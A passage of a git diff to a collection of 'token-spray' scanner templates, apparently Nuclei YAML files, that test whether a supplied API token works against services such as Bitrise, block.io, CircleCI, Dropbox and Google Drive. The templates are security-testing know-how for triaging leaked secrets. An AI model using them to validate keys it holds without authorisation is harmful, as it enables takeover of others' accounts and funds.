https://github.com/daffainfo/all-about-apikey/tree/main/bitrise + metadata: + max-request: 1 + tags: token-spray,bitrise + +self-contained: true + +http: + - raw: + - | + GET https://api.bitrise.io/v0.1/me HTTP/1.1 + Host: api.bitrise.io + Authorization: {{token}} + + matchers: + - type: word + part: body + words: + - '"username":' + - '"slug":' + - '"email":' + condition: and + +# digest: 4a0a0047304502203371c051bd3399996cc566f5864a6e016a56f383c0ced061c17e85d1117ab252022100d976865824087f7c211f9213a1452a87ad07e2b5aae257c8872a9e00ddd7bdda:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-bitrise.yaml b/poc/api/api-bitrise.yaml deleted file mode 100644 index 2d05c3282d..0000000000 --- a/poc/api/api-bitrise.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-bitrise - -info: - name: Bitrise API Test - author: daffainfo - severity: info - description: Build tool and processes integrations to create efficient development pipelines - reference: - - https://api-docs.bitrise.io/ - - https://github.com/daffainfo/all-about-apikey/tree/main/bitrise - tags: token-spray,bitrise - -self-contained: true -requests: - - raw: - - | - GET https://api.bitrise.io/v0.1/me HTTP/1.1 - Host: api.bitrise.io - Authorization: {{token}} - - matchers: - - type: word - part: body - words: - - '"username":' - - '"slug":' - - '"email":' - condition: and diff --git a/poc/api/api-block-400.yaml b/poc/api/api-block-400.yaml deleted file mode 100644 index 2fc7dfe928..0000000000 --- a/poc/api/api-block-400.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-block - -info: - name: block.io API Test - author: daffainfo - severity: info - description: Bitcoin Payment, Wallet & Transaction Data - reference: - - https://block.io/docs/basic - - https://github.com/daffainfo/all-about-apikey/tree/main/block - metadata: - max-request: 1 - tags: token-spray,block - -self-contained: true - -http: - - method: GET - path: - - "https://block.io/api/v2/get_balance/?api_key={{token}}" - - matchers: - - type: word - part: body - words: - - '"network"' - - '"available_balance"' - - '"pending_received_balance"' - condition: and - -# digest: 4b0a00483046022100fd81e0c16388146cbd2b450d6118a86ae188f23abff1b84fd08cdafc4d7638b1022100ba0a85f74493861f7ddbeb5e5f11a6ffc1a597ffc5da016918e2f8dcb099110c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-block.yaml b/poc/api/api-block.yaml new file mode 100644 index 0000000000..616a67dd9f --- /dev/null +++ b/poc/api/api-block.yaml @@ -0,0 +1,26 @@ +id: api-block + +info: + name: block.io API Test + author: daffainfo + severity: info + description: Bitcoin Payment, Wallet & Transaction Data + reference: + - https://block.io/docs/basic + - https://github.com/daffainfo/all-about-apikey/tree/main/block + tags: token-spray,block + +self-contained: true +requests: + - method: GET + path: + - "https://block.io/api/v2/get_balance/?api_key={{token}}" + + matchers: + - type: word + part: body + words: + - '"network"' + - '"available_balance"' + - '"pending_received_balance"' + condition: and diff --git a/poc/api/api-blockchain-399.yaml b/poc/api/api-blockchain-399.yaml index afa9207f6c..4f027d84d3 100644 --- a/poc/api/api-blockchain-399.yaml +++ b/poc/api/api-blockchain-399.yaml @@ -1,17 +1,13 @@ id: api-blockchain info: - name: Blockchain API Test + name: Blockhain API Test author: daffainfo severity: info reference: - https://api.blockchain.com/v3/#/ - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md tags: token-spray,blockchain - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 self-contained: true requests: @@ -29,5 +25,3 @@ requests: - '"balance"' - '"available"' condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/poc/api/api-blockchain.yaml b/poc/api/api-blockchain.yaml deleted file mode 100644 index 4f027d84d3..0000000000 --- a/poc/api/api-blockchain.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-blockchain - -info: - name: Blockhain API Test - author: daffainfo - severity: info - reference: - - https://api.blockchain.com/v3/#/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md - tags: token-spray,blockchain - -self-contained: true -requests: - - raw: - - | - GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 - Host: api.blockchain.com - X-API-Token: {{token}} - - matchers: - - type: word - part: body - words: - - '"currency"' - - '"balance"' - - '"available"' - condition: and diff --git a/poc/api/api-buildkite-402.yaml b/poc/api/api-buildkite-402.yaml index 7855f0b53b..39176ab3fb 100644 --- a/poc/api/api-buildkite-402.yaml +++ b/poc/api/api-buildkite-402.yaml @@ -3,18 +3,22 @@ id: api-buildkite info: name: Buildkite API Test author: zzeitlin - reference: https://buildkite.com/docs/apis/rest-api/user severity: info + reference: + - https://buildkite.com/docs/apis/rest-api/user + metadata: + max-request: 1 tags: token-spray,buildkite self-contained: true -requests: + +http: - method: GET path: - "https://api.buildkite.com/v2/user" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body @@ -22,4 +26,6 @@ requests: - '"id":' - '"graphql_id":' - '"email":' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a00473045022100b1e9462eb31a19937ecf593969002cadf169b17731937fb41f262e095067f02002206a2f5621877513735651c7cd41a13fec9c9d4e140adf8f696d5cda2dde328510:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-buildkite.yaml b/poc/api/api-buildkite.yaml deleted file mode 100644 index 77e8e1e677..0000000000 --- a/poc/api/api-buildkite.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-buildkite - -info: - name: Buildkite API Test - author: zzeitlin - reference: https://buildkite.com/docs/apis/rest-api/user - severity: info - tags: token-spray,buildkite - -requests: - - method: GET - path: - - "https://api.buildkite.com/v2/user" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 401 - negative: true diff --git a/poc/api/api-buttercms-403.yaml b/poc/api/api-buttercms-403.yaml index 229da7b1d5..13e2bf6449 100644 --- a/poc/api/api-buttercms-403.yaml +++ b/poc/api/api-buttercms-403.yaml @@ -3,17 +3,27 @@ id: api-buttercms info: name: ButterCMS API Test author: zzeitlin - reference: https://buttercms.com/docs/api/#introduction severity: info + reference: + - https://buttercms.com/docs/api/#introduction + metadata: + max-request: 1 tags: token-spray,buttercms -requests: +self-contained: true + +http: - method: GET path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"meta":' + - '"data":' + - '"url":' + condition: and + +# digest: 4a0a0047304502204dc8c9796e535808254d0eb5626dc45c1b06b31a8bf085440a59efa7dfdf7abc022100e54314942e38c520cc860c0fdb63002f2bb74bca1f4ff487cbc2d9c6e5a0e6a0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-calendly-404.yaml b/poc/api/api-calendly-404.yaml index 0d511e01ec..10a8e83478 100644 --- a/poc/api/api-calendly-404.yaml +++ b/poc/api/api-calendly-404.yaml @@ -3,22 +3,18 @@ id: api-calendly info: name: Calendly API Test author: zzeitlin + reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me severity: info - reference: - - https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me - metadata: - max-request: 1 tags: token-spray,calendly self-contained: true - -http: +requests: - method: GET path: - "https://calendly.com/api/v1/users/me" - headers: X-Token: "{{token}}" + matchers: - type: word part: body @@ -26,6 +22,4 @@ http: - '"data":' - '"id":' - '"email":' - condition: and - -# digest: 4a0a00473045022100e831b694f92daa23cba4637646ee6eb40171e699067710e865d8666f3bcaa2e002205a5e6d92632f7ea24402afe34c8d87f6cfede195fe217b87725a477ecdab0819:922c64590222798bb761d5b6d8e72950 + condition: and \ No newline at end of file diff --git a/poc/api/api-circleci-406.yaml b/poc/api/api-circleci-406.yaml index b01e427381..281d22b656 100644 --- a/poc/api/api-circleci-406.yaml +++ b/poc/api/api-circleci-406.yaml @@ -5,18 +5,14 @@ info: author: zzeitlin reference: https://circleci.com/docs/api/v1 severity: info - tags: token-spray,circleci + tags: token-spray,circle,circleci -self-contained: true requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: word - part: body - words: - - '"admin"' - - '"login"' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-circleci.yaml b/poc/api/api-circleci.yaml deleted file mode 100644 index 281d22b656..0000000000 --- a/poc/api/api-circleci.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: api-circleci - -info: - name: CircleCI API Test - author: zzeitlin - reference: https://circleci.com/docs/api/v1 - severity: info - tags: token-spray,circle,circleci - -requests: - - method: GET - path: - - "https://circleci.com/api/v1.1/me?circle-token={{token}}" - - matchers: - - type: status - status: - - 200 diff --git a/poc/api/api-coinapi-408.yaml b/poc/api/api-coinapi-408.yaml deleted file mode 100644 index f4285dd83b..0000000000 --- a/poc/api/api-coinapi-408.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-coinapi - -info: - name: CoinAPI API Test - author: daffainfo - severity: info - description: All Currency Exchanges integrate under a single api - reference: - - https://docs.coinapi.io/ - - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi - metadata: - max-request: 1 - tags: token-spray,coinapi - -self-contained: true - -http: - - raw: - - | - GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 - Host: rest.coinapi.io - X-CoinAPI-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"exchange_id":' - - '"website":' - - '"name":' - condition: and - -# digest: 4b0a00483046022100a574100efec77cf185d51fc83943f788217c9e1ad8e7a40c0180da3559fb1bb9022100fc3450c1ba3a0494de47b64ec3f0d6da00d95a293b5d7a8f1f804c6668a9d31a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-coinapi.yaml b/poc/api/api-coinapi.yaml new file mode 100644 index 0000000000..e4a2e44374 --- /dev/null +++ b/poc/api/api-coinapi.yaml @@ -0,0 +1,28 @@ +id: api-coinapi + +info: + name: CoinAPI API Test + author: daffainfo + severity: info + description: All Currency Exchanges integrate under a single api + reference: + - https://docs.coinapi.io/ + - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi + tags: token-spray,coinapi + +self-contained: true +requests: + - raw: + - | + GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 + Host: rest.coinapi.io + X-CoinAPI-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"exchange_id":' + - '"website":' + - '"name":' + condition: and diff --git a/poc/api/api-cooperhewitt-411.yaml b/poc/api/api-cooperhewitt-411.yaml index 0da30b58ee..c54d64e093 100644 --- a/poc/api/api-cooperhewitt-411.yaml +++ b/poc/api/api-cooperhewitt-411.yaml @@ -16,10 +16,6 @@ requests: - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" matchers: - - type: word - part: body - words: - - '"stat":' - - '"formats":' - - '"default_format":' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-debounce-414.yaml b/poc/api/api-debounce-414.yaml deleted file mode 100644 index 5165087c3d..0000000000 --- a/poc/api/api-debounce-414.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-debounce - -info: - name: DeBounce API Test - author: 0ri2N - severity: info - reference: - - https://developers.debounce.io/reference/api-key-authentication - - https://debounce.io - metadata: - max-request: 1 - tags: debounce,token-spray - -self-contained: true - -http: - - method: GET - path: - - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh" - - matchers: - - type: word - part: body - words: - - '"balance":' - - '"success":' - - '"debounce":' - condition: and - -# digest: 4b0a00483046022100e57b205a3f73c6e7e29816f801b5277bd2dbe0c6134dd792258d95567af00b53022100a1cd71dd14faa6281554f570b8499e0a59d0247273e01878709c3e6b19084032:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-debounce.yaml b/poc/api/api-debounce.yaml new file mode 100644 index 0000000000..2ed95d091b --- /dev/null +++ b/poc/api/api-debounce.yaml @@ -0,0 +1,25 @@ +id: api-debounce + +info: + name: DeBounce API Test + author: 0ri2N + severity: info + reference: + - https://developers.debounce.io/reference/api-key-authentication + - https://debounce.io + tags: debounce,token-spray + +self-contained: true +requests: + - method: GET + path: + - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" + + matchers: + - type: word + part: body + words: + - '"balance":' + - '"success":' + - '"debounce":' + condition: and diff --git a/poc/api/api-deviantart-415.yaml b/poc/api/api-deviantart-415.yaml new file mode 100644 index 0000000000..999f0421e1 --- /dev/null +++ b/poc/api/api-deviantart-415.yaml @@ -0,0 +1,27 @@ +id: api-deviantart + +info: + name: DeviantArt API Test + author: zzeitlin + severity: info + reference: + - https://www.deviantart.com/developers/authentication + metadata: + max-request: 1 + tags: token-spray,deviantart + +self-contained: true + +http: + - method: POST + path: + - "https://www.deviantart.com/api/v1/oauth2/placebo" + + body: "access_token={{token}}" + matchers: + - type: word + part: body + words: + - '"status" : "success"' + +# digest: 4b0a00483046022100800735e2524013964159af06cb5f0c2ba32282bb38f18d961f592b109b7763de022100e53dfb233bb0bb614a8553e084ca457cb3b701367c471fc0fadce3ee2a66eba8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-deviantart.yaml b/poc/api/api-deviantart.yaml deleted file mode 100644 index b09e9acd2b..0000000000 --- a/poc/api/api-deviantart.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-deviantart - -info: - name: DeviantArt API Test - author: zzeitlin - severity: info - reference: https://www.deviantart.com/developers/authentication - tags: token-spray,deviantart - -self-contained: true -requests: - - method: POST - path: - - "https://www.deviantart.com/api/v1/oauth2/placebo" - body: "access_token={{token}}" - - matchers: - - type: word - part: body - words: - - '"status" : "success"' diff --git a/poc/api/api-dribbble-416.yaml b/poc/api/api-dribbble-416.yaml index ec36263d18..d9dd5f5a41 100644 --- a/poc/api/api-dribbble-416.yaml +++ b/poc/api/api-dribbble-416.yaml @@ -4,13 +4,17 @@ info: name: Dribbble API Test author: daffainfo severity: info + description: Dribbble is a self-promotion and social networking platform for digital designers and creatives reference: - https://developer.dribbble.com/v2/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md + - https://github.com/daffainfo/all-about-apikey/tree/main/dribbble + metadata: + max-request: 1 tags: token-spray,dribbble self-contained: true -requests: + +http: - method: GET path: - "https://api.dribbble.com/v2/user?access_token={{token}}" @@ -19,3 +23,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402207ca77c15aa3f5dc5598a37cbd3e79b882bf1ac2c6144c11a17a4832dda005035022074dd2aa3ddcdbcc547cbc65d4d0dd7033d9d0198ea69032bd1dbe3f28068a2c8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-dribbble.yaml b/poc/api/api-dribbble-417.yaml similarity index 100% rename from poc/api/api-dribbble.yaml rename to poc/api/api-dribbble-417.yaml diff --git a/poc/api/api-dropbox-418.yaml b/poc/api/api-dropbox-418.yaml index cc14c60421..29679e2b2f 100644 --- a/poc/api/api-dropbox-418.yaml +++ b/poc/api/api-dropbox-418.yaml @@ -7,7 +7,6 @@ info: severity: info tags: token-spray,dropbox -self-contained: true requests: - method: POST path: @@ -16,9 +15,6 @@ requests: Authorization: Bearer {{token}} matchers: - - type: word - part: body - words: - - '"account_id":' - - '"email":' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-europeana-419.yaml b/poc/api/api-europeana-419.yaml index 520c83775d..c0767ce8d7 100644 --- a/poc/api/api-europeana-419.yaml +++ b/poc/api/api-europeana-419.yaml @@ -16,6 +16,10 @@ requests: - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - 'success' + - 'apikey' + - 'action' + condition: and \ No newline at end of file diff --git a/poc/api/api-europeana-420.yaml b/poc/api/api-europeana-420.yaml new file mode 100644 index 0000000000..520c83775d --- /dev/null +++ b/poc/api/api-europeana-420.yaml @@ -0,0 +1,21 @@ +id: api-europeana + +info: + name: Europeana API Test + author: daffainfo + severity: info + reference: + - https://pro.europeana.eu/page/search + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md + tags: token-spray,europeana + +self-contained: true +requests: + - method: GET + path: + - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" + + matchers: + - type: status + status: + - 200 diff --git a/poc/api/api-europeana-421.yaml b/poc/api/api-europeana-421.yaml index bbc103ac30..713a3a7e6e 100644 --- a/poc/api/api-europeana-421.yaml +++ b/poc/api/api-europeana-421.yaml @@ -4,13 +4,17 @@ info: name: Europeana API Test author: daffainfo severity: info + description: European Museum and Galleries content reference: - https://pro.europeana.eu/page/search - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Europeana.md + - https://github.com/daffainfo/all-about-apikey/tree/main/europeana + metadata: + max-request: 1 tags: token-spray,europeana self-contained: true -requests: + +http: - method: GET path: - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" @@ -22,4 +26,6 @@ requests: - 'success' - 'apikey' - 'action' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a004730450220403070e888a319ba4a50aadc9e5d82db018198fb50ac63142aeca81fb62dc496022100f98c0738e60b20fb3a4dcfb88eed70705433fc0c6d902f699fc4f7de3d5de1e9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-fastly-424.yaml b/poc/api/api-fastly-424.yaml new file mode 100644 index 0000000000..9688149ef5 --- /dev/null +++ b/poc/api/api-fastly-424.yaml @@ -0,0 +1,25 @@ +id: api-fastly + +info: + name: Fastly API Test + author: Adam Crosser + severity: info + reference: + - https://developer.fastly.com/reference/api/ + tags: token-spray,fastly + +self-contained: true +requests: + - method: GET + path: + - "https://api.fastly.com/current_user" + headers: + Fastly-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"created_at":' + - '"customer_id":' + condition: and diff --git a/poc/api/api-fastly.yml b/poc/api/api-fastly.yaml similarity index 100% rename from poc/api/api-fastly.yml rename to poc/api/api-fastly.yaml diff --git a/poc/api/api-festivo-425.yaml b/poc/api/api-festivo-425.yaml new file mode 100644 index 0000000000..df1c5858ee --- /dev/null +++ b/poc/api/api-festivo-425.yaml @@ -0,0 +1,31 @@ +id: api-festivo + +info: + name: Festivo API Test + author: daffainfo + severity: info + description: Fastest and most advanced public holiday and observance service on the market + reference: + - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ + - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays + metadata: + max-request: 1 + tags: token-spray,festivo + +self-contained: true + +http: + - method: GET + path: + - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" + + matchers: + - type: word + part: body + words: + - '"id":' + - '"holidays":' + - '"name":' + condition: and + +# digest: 490a004630440220310ec371cb4874227f93c2d3efec48996e61a2e60b9b4e7eb7c11cacabdd07e7022015e3fc75ad7459d05cc1b5cac21f7d6ef42a93c521d0354d4165c5a3743d7bbe:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-festivo.yaml b/poc/api/api-festivo.yaml deleted file mode 100644 index 3911ce2636..0000000000 --- a/poc/api/api-festivo.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-festivo - -info: - name: Festivo API Test - author: daffainfo - severity: info - description: Fastest and most advanced public holiday and observance service on the market - reference: - - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays - tags: token-spray,festivo - -self-contained: true -requests: - - method: GET - path: - - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" - - matchers: - - type: word - part: body - words: - - '"id":' - - '"holidays":' - - '"name":' - condition: and diff --git a/poc/api/api-fortitoken-cloud.yaml b/poc/api/api-fortitoken-cloud.yaml index 3a49a9a760..2e71549626 100644 --- a/poc/api/api-fortitoken-cloud.yaml +++ b/poc/api/api-fortitoken-cloud.yaml @@ -3,15 +3,20 @@ id: api-fortitoken-cloud info: name: FortiToken Cloud API Test author: dwisiswant0 - reference: https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview severity: info + reference: + - https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview + metadata: + max-request: 1 tags: token-spray,fortinet self-contained: true -requests: + +http: - method: GET path: - "https://ftc.fortinet.com:9696/api/v1/user" + headers: Authorization: Bearer {{token}} @@ -26,3 +31,5 @@ requests: regex: - "error_(code|message|name)" negative: true + +# digest: 4b0a0048304602210085dec939ca5aa4774aa6f9061c9f5dd131840d9c20832e13ca23afa1257873f2022100b6641576a1409c2d37274fd46d42e9c46ff5e2e13486e63eddd92c1a1e5dba1d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-fullhunt-428.yaml b/poc/api/api-fullhunt-428.yaml deleted file mode 100644 index 482e0add20..0000000000 --- a/poc/api/api-fullhunt-428.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: api-fullhunt - -info: - name: FullHunt API Test - author: 0ri2N - severity: info - description: | - FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet. - reference: - - https://fullhunt.io - - https://api-docs.fullhunt.io - metadata: - max-request: 1 - tags: scan,recon,fullhunt,token-spray - -self-contained: true - -http: - - method: GET - path: - - https://fullhunt.io/api/v1/domain/interact.sh/details - - headers: - X-API-Key: "{{token}}" - matchers: - - type: word - part: body - words: - - '"dns"' - - '"hosts"' - - '"domain"' - condition: and - -# digest: 490a0046304402204f47d3dda160c97d6d7dbbc58055bd71e3f56df6076538d0fe0e889984987ebc02206ba9c340c581b0432223893d5b1138c0c07420a3e5213c0d9e4a9c7257df938f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-fullhunt.yaml b/poc/api/api-fullhunt.yaml new file mode 100644 index 0000000000..dd160e504b --- /dev/null +++ b/poc/api/api-fullhunt.yaml @@ -0,0 +1,29 @@ +id: api-fullhunt + +info: + name: FullHunt API Test + author: 0ri2N + severity: info + description: | + FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet. + reference: + - https://fullhunt.io + - https://api-docs.fullhunt.io + tags: dns,scan,recon,fullhunt,database,token-spray + +self-contained: true +requests: + - method: GET + path: + - https://fullhunt.io/api/v1/domain/example.com/details + headers: + X-API-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"dns"' + - '"hosts"' + - '"domain"' + condition: and diff --git a/poc/api/api-google-drive-432.yaml b/poc/api/api-google-drive-432.yaml new file mode 100644 index 0000000000..f66896d7c3 --- /dev/null +++ b/poc/api/api-google-drive-432.yaml @@ -0,0 +1,28 @@ +id: api-google-drive + +info: + name: Google Drive API Test + author: geeknik + severity: info + reference: + - https://developers.google.com/drive/api/guides/about-sdk + metadata: + max-request: 1 + tags: token-spray,google,drive,intrusive + +self-contained: true + +http: + - raw: + - | + GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 + Referer: {{referer}} + Content-Type:application/json + + matchers: + - type: word + part: body + words: + - 'File not found: {{randstr}}.txt.' + +# digest: 4b0a00483046022100f3d2e430755236cb5354472588b85c1caa009551fffb628d51c8321a8c900fd3022100c756303eff99e074d92d5f4b223322b94572b1515b741fee9473fa14cc0984ef:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-google-drive.yaml b/poc/api/api-google-drive.yaml deleted file mode 100644 index b274fd83c5..0000000000 --- a/poc/api/api-google-drive.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-google-drive - -info: - name: Google Drive API Test - author: geeknik - severity: info - reference: - - https://developers.google.com/drive/api/guides/about-sdk - tags: token-spray,google,drive - -self-contained: true -requests: - - raw: - - | - GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 - Referer: {{BaseURL}} - Content-Type:application/json - - matchers: - - type: word - part: body - words: - - 'File not found: {{randstr}}.txt.' diff --git a/poc/api/api-hirak-rates-436.yaml b/poc/api/api-hirak-rates-436.yaml deleted file mode 100644 index 0557cf59fe..0000000000 --- a/poc/api/api-hirak-rates-436.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: api-hirak-rates - -info: - name: Hirak Exchange Rates API Test - author: daffainfo - severity: info - description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits - reference: - - https://rates.hirak.site/ - - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates - metadata: - max-request: 1 - tags: token-spray,hirak - -self-contained: true - -http: - - method: GET - path: - - "https://rates.hirak.site/stat/?token={{token}}" - - matchers: - - type: word - part: body - words: - - '"token":' - - '"plan":' - - '"hits":' - - '"remain":' - condition: and - -# digest: 4b0a00483046022100feb1b70cc116a0e5e28e60351b93907f2994f9f53d4f5ce7337bd1e5581d1f95022100932bf3b672f01049a27014ca2bac8996fb16ac2f4ab829bdf96a780ecd3620ec:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-hirak-rates.yaml b/poc/api/api-hirak-rates.yaml new file mode 100644 index 0000000000..6d61403334 --- /dev/null +++ b/poc/api/api-hirak-rates.yaml @@ -0,0 +1,27 @@ +id: api-hirak-rates + +info: + name: Hirak Exchange Rates API Test + author: daffainfo + severity: info + description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits + reference: + - https://rates.hirak.site/ + - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates + tags: token-spray,hirak + +self-contained: true +requests: + - method: GET + path: + - "https://rates.hirak.site/stat/?token={{token}}" + + matchers: + - type: word + part: body + words: + - '"token":' + - '"plan":' + - '"hits":' + - '"remain":' + condition: and diff --git a/poc/api/api-hubspot.yaml b/poc/api/api-hubspot.yaml deleted file mode 100644 index 86566864f0..0000000000 --- a/poc/api/api-hubspot.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-hubspot - -info: - name: HubSpot API Test - author: zzeitlin - reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners - severity: info - tags: token-spray,hubspot - -requests: - - method: GET - path: - - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - - matchers: - - type: word - part: body - words: - - 'error' - negative: true diff --git a/poc/api/api-iconfinder-439.yaml b/poc/api/api-iconfinder-439.yaml new file mode 100644 index 0000000000..1d396884b1 --- /dev/null +++ b/poc/api/api-iconfinder-439.yaml @@ -0,0 +1,34 @@ +id: api-iconfinder + +info: + name: IconFinder API Test + author: daffainfo + severity: info + description: Web Icons + reference: + - https://developer.iconfinder.com/reference/overview-1 + - https://github.com/daffainfo/all-about-apikey/tree/main/iconfinder + metadata: + max-request: 1 + tags: token-spray,iconfinder + +self-contained: true + +http: + - raw: + - | + GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1 + Host: api.iconfinder.com + Accept: application/json + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"icons":' + - '"is_icon_glyph":' + - '"download_url":' + condition: and + +# digest: 4a0a0047304502203525d06ca37e214ea31d40d32b70a0e233bf879bee960cbb34fb4436a8c78320022100a678e3bcbc2678eaa6fe709c8b1210b528254b68294b4ce07620fbe1c000ed6f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-improvmx-440.yaml b/poc/api/api-improvmx-440.yaml deleted file mode 100644 index a8aa0d0bdd..0000000000 --- a/poc/api/api-improvmx-440.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: api-improvmx - -info: - name: ImprovMX API Test - author: daffainfo - severity: info - description: API for free email forwarding service - reference: - - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx - metadata: - max-request: 1 - tags: token-spray,improvmx - -self-contained: true - -http: - - raw: - - | - GET https://api.improvmx.com/v3/account HTTP/1.1 - Authorization: Basic {{base64(':' + token)}} - Host: api.improvmx.com - - host-redirects: true - max-redirects: 1 - matchers: - - type: word - part: body - words: - - '"billing_email":' - - '"cancels_on":' - - '"company_details":' - condition: and - -# digest: 4a0a00473045022100db35cda579311d7b993f8e4fb034c403ba8a5a5ea00221d77f6650a00814fa4902207fbfec013eb2a1c5bf89081ba3c5aa547ebe8b8a6db4f329cd99701c70307b32:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-improvmx.yaml b/poc/api/api-improvmx.yaml new file mode 100644 index 0000000000..fb6c00f0d9 --- /dev/null +++ b/poc/api/api-improvmx.yaml @@ -0,0 +1,30 @@ +id: api-improvmx + +info: + name: ImprovMX API Test + author: daffainfo + severity: info + description: API for free email forwarding service + reference: + - https://improvmx.com/api + - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx + tags: token-spray,improvmx + +self-contained: true +requests: + - raw: + - | + GET https://api.improvmx.com/v3/account HTTP/1.1 + Authorization: Basic {{base64(':' + token)}} + Host: api.improvmx.com + + redirects: true + max-redirects: 1 + matchers: + - type: word + part: body + words: + - '"billing_email":' + - '"cancels_on":' + - '"company_details":' + condition: and diff --git a/poc/api/api-instagram.yaml b/poc/api/api-instagram.yaml index 7a9e6301f0..fc463c8bac 100644 --- a/poc/api/api-instagram.yaml +++ b/poc/api/api-instagram.yaml @@ -3,16 +3,12 @@ id: api-instagramgraph info: name: Instagram Graph API Test author: zzeitlin + reference: https://developers.facebook.com/docs/instagram-api/getting-started severity: info - reference: - - https://developers.facebook.com/docs/instagram-api/getting-started - metadata: - max-request: 1 tags: token-spray,instagram,graph self-contained: true - -http: +requests: - method: GET path: - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" @@ -25,5 +21,3 @@ http: - '"access_token":' - '"name":' condition: and - -# digest: 